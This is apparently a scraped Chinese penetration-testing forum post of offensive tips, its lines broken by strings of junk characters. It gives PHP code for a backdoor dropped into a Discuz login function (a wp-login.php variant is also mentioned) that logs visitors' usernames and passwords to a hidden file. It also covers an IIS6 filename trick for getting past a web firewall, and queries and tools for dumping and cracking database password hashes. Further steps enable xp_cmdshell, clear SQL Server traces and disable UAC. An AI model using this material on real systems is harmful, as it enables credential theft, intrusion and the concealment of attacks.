$ @+ S$ Q1 E5 b8 r* g0 |' n* A* m! A就是搜索case ‘login’, D: ]- w: T8 g3 F- T( Y6 y: U' A
在它下面直接插入即可,记录的密码生成在pwd.txt中,- k. ~2 o; y4 i$ I/ k
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
( s# `# g& e( a) d1 i" P6 d利用II6文件解析漏洞绕过安全狗代码:& l8 q7 R* p# i( k- K2 g
;antian365.asp;antian365.jpg
2 c" L5 ^3 x+ R$ l% U3 E
" J( ?' @& M) C' y各种类型数据库抓HASH破解最高权限密码!
  K$ C; `% I6 g$ Y1.sql server2000
! u3 m* g. M+ f. \0 n( LSELECT password from master.dbo.sysxlogins where name='sa'
7 l2 D# V. G  Y" t7 I0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341+ ^  S) u0 \0 Z
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A( B0 A8 n8 W* a3 J( A( h

3 x) d, X3 O1 G! I% Q' j0×0100- constant header
0 W7 c! r; s7 K$ t% s34767D5C- salt
# y# Q; a" x2 j0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
& h9 d4 M: ^' v2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash- y# G$ ], G7 U
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash$ U$ l+ p' v' P1 q
SQL server 2005:-
& J: O6 O- Q7 D( Y6 _SELECT password_hash FROM sys.sql_logins where name='sa'
  m; D) X' g) Q6 b' w2 |0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
+ ^9 W2 [& z: S5 ~0×0100- constant header0 O# R' A" _7 o0 z% C
993BF231-salt
7 S9 G& @/ n! C& m2 s) D( @5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
5 W0 o* x( R( E% T/ _6 Qcrack case sensitive hash in cain, try brute force and dictionary based attacks.: J6 b- `9 g$ q

+ {0 D# w2 o- p1 S+ q0 \update:- following bernardo’s comments:-3 [) g" c* C6 R+ w" o5 i1 |" y5 E
use function fn_varbintohexstr() to cast password in a hex string.. `2 K! W4 \( `1 @4 m& c
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins* h  f- o, t3 C5 ^

. {5 b1 s: }  T- H9 dMYSQL:-
0 N; M) Q. O& ^8 E  N% a: G( x% y, _" c* m9 l2 H
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.' F# p& R6 H1 C* K& z
* z: G/ ^: L) w. E" G  K
*mysql  < 4.1
$ P$ `7 T& Z3 p$ |
( J# F# W' t( Imysql> SELECT PASSWORD(‘mypass’);! A2 o. Q# w) f# `4 P
+——————–+7 c" d6 U8 E6 m, `
| PASSWORD(‘mypass’) |
3 }: E3 F+ @5 t% U4 N+——————–+: v9 P8 {7 @2 n0 n6 M7 k: U
| 6f8c114b58f2ce9e   |, f  I  a/ t$ g7 G
+——————–+
  ^8 \- E, `+ C
  P- ?2 g; x( ~. S  L*mysql >=4.1$ P  ?" G1 ?: G' p

  u- a, J7 r/ p  |& l! r% V) j- Hmysql> SELECT PASSWORD(‘mypass’);1 f' W; h3 y6 m& i4 H6 \
+——————————————-+
2 K) d: C7 C: T4 F# M| PASSWORD(‘mypass’)                        |, L& j+ M3 j5 G
+——————————————-+
  z$ w' T. P- G/ A7 t| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |1 c( q$ M& N4 P/ R8 G8 b' v
+——————————————-+
$ t5 c+ k+ [* ^- U' W9 M! {9 l' z' t8 x7 t) o$ k9 t
Select user, password from mysql.user
. k  Y4 e. v& UThe hashes can be cracked in ‘cain and abel’$ w+ \& n8 W* J+ a; t1 J' K/ h

+ ?+ t& X/ b( |/ w  dPostgres:-
  J/ _; z' x' G3 H3 ?Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
5 }6 ~% F$ B5 S# ^7 P. Qselect usename, passwd from pg_shadow;1 [+ n- L# I3 f7 d( x
usename      |  passwd
6 L8 R% D# ?2 v* N; \/ U3 O2 o——————+————————————-
& }' b: a) J& [/ W  v: A$ Stestuser            | md5fabb6d7172aadfda4753bf0507ed4396; X8 \8 Y. c! ^, o6 e) b: B" h
use mdcrack to crack these hashes:-
( U  f2 j. p( h$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396" S# m/ N8 O8 F+ U

  J' X. Z: n2 H3 ^% ?% d4 i9 L! yOracle:-
! `5 j( N% g6 I. \select name, password, spare4 from sys.user$' l6 t% C  I1 x5 r" Z
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
' p( ^" C  h3 J5 [% D) |More on Oracle later, i am a bit bored….
* L0 _$ l* }7 p- ?8 o. B
. ?+ e& m# i: S, ?2 n9 x; d" h- p% \/ W" H* B
在sql server2005/2008中开启xp_cmdshell1 s3 e* v6 L9 ~+ q% }
-- To allow advanced options to be changed.
4 v* I6 s0 Y: YEXEC sp_configure 'show advanced options', 1) ^* j% u: e# ?# m! R. o6 }
GO
  U4 Y- ?2 W* J. X-- To update the currently configured value for advanced options./ J/ A7 ?! r) Z4 ^/ _% m
RECONFIGURE
/ y9 F4 Y- v! QGO
- v: Y$ m+ [/ u-- To enable the feature.
6 O6 k. E0 z4 d6 qEXEC sp_configure 'xp_cmdshell', 1  Z' w$ `- W/ i" B+ Q4 T7 Q
GO4 Z) z3 k$ B. k6 l& b, F3 f
-- To update the currently configured value for this feature., [  X5 O$ F7 ^( S
RECONFIGURE% {, L! v! I6 E; S, V. K
GO7 G: c  K* T$ z& ^" k& V
SQL 2008 server日志清除,在清楚前一定要备份。
' d1 c% a$ V" _2 U如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:. P" y+ Q0 ~$ Q# D
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
. i0 ?0 F3 R1 Y) V$ P9 G( e: _3 r; t( J8 T) E7 \5 h5 ~# }+ r
对于SQL Server 2008以前的版本:7 H/ H% g$ G8 o* w. {
SQL Server 2005:
, R" i2 ~+ [) j删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat) b* ^, B+ z4 N$ k7 p
SQL Server 2000:6 W9 ^8 n' e7 R4 c
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
8 P/ _' M4 l0 c4 R5 f& `
& q* ?8 f# @6 L" r4 |3 \# I本帖最后由 simeon 于 2013-1-3 09:51 编辑  l  F" k+ z8 m

$ T( b7 X" U) j
2 Y" D4 C& r1 g2 Y+ o8 Nwindows 2008 文件权限修改: m2 u" u9 B4 I. F: F
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
& P$ {4 X& I6 t$ d# c8 ?. ~2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
0 K2 q* k$ A& {" {8 P7 t一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
+ ~9 R  }# C7 R3 H$ y0 E, W% @! _' D
Windows Registry Editor Version 5.00) O1 k) z  o7 `3 p* d
[HKEY_CLASSES_ROOT\*\shell\runas]3 v) f. U) z2 \) [& d; L* F- \0 @
@="管理员取得所有权"/ E% s, h0 g: x* e4 V, V
"NoWorkingDirectory"=""
2 h, h4 |; J4 D9 [; n6 B) y& x4 x[HKEY_CLASSES_ROOT\*\shell\runas\command]3 B9 c, M; Y; @" ]6 ~- u
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 t3 G/ s" U2 f% w"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& v2 @. O( e2 {  u- ]" A  a[HKEY_CLASSES_ROOT\exefile\shell\runas2]; n: }7 H3 C% m. D
@="管理员取得所有权"
7 N$ i; B7 c3 O1 h( J3 ^$ l, U$ g& _"NoWorkingDirectory"=""
* u8 J3 R' F# Q$ \[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
# D( I' ?, K2 O) ?  L8 o& C@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- O- Y5 E: h: e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# l% q( P" ^( s
! d5 I4 w+ `9 [& O3 M; x0 P
[HKEY_CLASSES_ROOT\Directory\shell\runas]
) j2 n1 H8 p. Q! ~4 b@="管理员取得所有权"
2 ?' Z! ^4 o, ]5 d"NoWorkingDirectory"=""  {' R# r- d2 l/ p5 ~1 E
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
( e8 {& `( P- ?7 W2 }3 r% z@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"& x' ?3 t9 I% X5 L: Q) X& K
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' A+ h) E, w: }* {% F6 l& j
, \- I3 C6 H9 A* r" g9 v7 O( j7 w
( F% O% H" S$ p  }% N& n% I
win7右键“管理员取得所有权”.reg导入6 \' a' ], ^) G6 O9 B$ E. J
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
, g, @: _- E- y* o5 Y3 q0 B9 c1、C:\Windows这个路径的“notepad.exe”不需要替换8 w$ n) l# c4 ^0 x( p* h0 |
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
6 t! `2 G+ U1 T9 h- n- T* v6 S* P3、四个“notepad.exe.mui”不要管
. Y5 L' D1 R1 Z& b: [4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和+ A' i2 b1 L( O5 ?9 P
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
; b8 e& W% M* h% |替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,/ ~) ?0 t; K" f- x7 y% F8 k
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
; h7 }7 K( B# ~/ Rwindows 2008中关闭安全策略:
$ [2 ~( _% h$ y" _! nreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f/ D) I; H) t9 z
修改uc_client目录下的client.php 在
8 |0 k& _; H$ P( E- g* lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, F9 Y- q' \0 @, n8 L下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
, k7 m$ e" @$ X2 a2 e- s你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
: u6 N" d2 u) [: [; C- g$ w/ vif(getenv('HTTP_CLIENT_IP')) {9 W7 ~7 U, q) @& [! X7 M6 }
$onlineip = getenv('HTTP_CLIENT_IP');
4 F+ k$ Y% u) ^9 x1 D# I5 x, J} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
# H! T" j1 O  N4 \5 J$onlineip = getenv('HTTP_X_FORWARDED_FOR');
' T/ w+ h: _6 a9 f# Q} elseif(getenv('REMOTE_ADDR')) {
6 e; g) `$ t/ ]/ L/ D: P$onlineip = getenv('REMOTE_ADDR');" t& Q: ~9 d) `3 k* P' T; ^
} else {
2 I% P' s: N& `) R8 k$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];. T5 k1 f: `5 }% d. h  H1 M
}* w- u* M" k. T/ Z
     $showtime=date("Y-m-d H:i:s");8 N5 U; w' S+ p' O; b$ V; u
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, q0 c; ?4 B% p
    $handle=fopen('./data/cache/csslog.php','a+');
! N1 W9 H+ g8 f) @5 \4 d    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2